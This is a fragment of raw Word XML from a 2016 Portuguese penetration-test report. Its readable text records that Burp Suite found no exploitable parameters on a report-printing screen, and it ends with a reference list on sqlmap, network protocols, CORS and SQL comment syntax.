            <wp:extent cx="5305246" cy="2684437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orio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15DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Figura 36- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Impressão de Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008C6DC7" w:rsidP="008719F1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Da mesma maneira que </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foi detectado na tela Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, a ferramenta indica que a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Impressão de Relatório</w:t>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> não gera nenhum tipo de requisição e não recebe nenhum parâmetro manipulável. Dessa forma, </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>não foram encontradas vulnerabilidades que pudessem ser exploradas.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015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24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sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Referências</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B7131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C815A6" w:rsidRDefault="008A79EE" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr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5">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Piores Senhas 2015</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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6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SQLMAP usando POST</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId47"/>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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8" w:history="1">
        <w:r w:rsidR="008C6DC7" w:rsidRPr="00C815A6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
            <w:sz w:val="20"/>
          </w:rPr>
          <w:t>NTP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8A79EE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9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NetBios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8A79EE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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId50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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SNMP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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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1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CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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2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w3c - Especificação CORS</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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3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MYSQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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4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SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00C815A6" w:rsidRDefault="008A79EE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5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Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2484"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00906B58" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB70B5" w:rsidRPr="008C6DC7" w:rsidRDefault="00DB70B5" w:rsidP="008C6DC7"/>
    <w:sectPr w:rsidR="00DB70B5" w:rsidRPr="008C6DC7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52FA" w:rsidRDefault="005352FA" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005352FA" w:rsidRDefault="005352FA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52FA" w:rsidRDefault="005352FA" w:rsidP="009A6B56">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005352FA" w:rsidRDefault="005352FA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0000001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2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5">
    <w:nsid w:val="06A058F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96129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93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1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96" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7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8">
    <w:nsid w:val="0C8D2FE2"/>
    <w:multiLevelType w:val="single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9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0">
    <w:nsid w:val="11C84F32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B9859FC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46231EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F76FCC2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2484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3204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924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4644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5364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6084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6804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7524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8244" w:firstLine="12600"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12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3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4">
    <w:nsid w:val="377721E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6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8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7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768" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19">
    <w:nsid w:val="438B6AB6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D388D42"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="0"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20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1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2">
    <w:nsid w:val="4A3B0464"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1722B0B4"/>
    <w:lvl w:ilvl="0" w:tplc="0416001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2868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31F6E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5">
    <w:nsid w:val="50632F5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAEE1C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7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8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62C448D7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63B0132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6035B30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2774EF72"/>
    <w:lvl w:ilvl="0" w:tplc="117C49D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3228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3948" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4668" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5388" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6108" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6828" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7548" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8268" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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33">
    <w:nsid w:val="68F83A59"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="32D4740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34">
    <w:nsid w:val="6F0A187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5">
    <w:nsid w:val="700654C4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6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8">
    <w:nsid w:val="789137E5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9">
    <w:nsid w:val="7A6F4945"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D382A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E62768"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7CA1E42"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1068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788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08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28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48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68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388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08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28" w:firstLine="6120"/>
      </w:pPr>
      <w:rPr>
        <w:u w:val="none"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41">
    <w:nsid w:val="7B9853A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42">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC4475C4"/>
    <w:lvl w:ilvl="0" w:tplc="0416000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4128" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4848" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5568" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6288" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0416001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="7008" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0416000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7728" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04160019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8448" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0416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43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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18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9">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="33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15DE3"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF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E88D0C9-8678-4A66-852D-FC518CBC9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41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jpg"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protocol" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/comment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yperlink" Target="https://hackertarget.com/sqlmap-post-request-injec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41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105).asp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g"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dev.mysql.com/doc/refman/5.7/en/comment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192.168.0.58/vacina/login.php?logado=false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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS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://192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/co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g"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protoco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://software.dzhuvinov.com/cors-filter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975F67-74BC-4BE7-B0F4-18257814C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</Pages>
  <Words>7416</Words>
  <Characters>40051</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>333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Diego</cp:lastModifiedBy>
  <cp:revision>123</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-25T02:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-27T18:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>